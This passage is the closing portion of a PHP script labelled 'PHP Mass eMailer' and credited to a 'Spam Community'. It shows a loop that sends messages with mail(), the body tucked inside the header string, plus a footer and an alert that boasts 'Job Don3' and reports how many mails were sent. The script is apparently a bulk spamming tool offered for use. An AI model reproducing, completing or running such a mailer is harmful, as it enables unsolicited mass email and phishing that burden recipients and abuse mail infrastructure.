                $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";

                $header .= "$message\r\n";

              mail($to, $subject, "", $header);

                print "ok<br>";

                flush();


                }

                }



}



?>
<p class="style1">PHP Mass eMailer<br>
  &copy Spam Community '09.<br>
      </p>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo "<script>alert('Job Don3 by Online Community\\r\\n$numemails mail(s) was sent successfully'); </script>";}
?>

</body>

</html>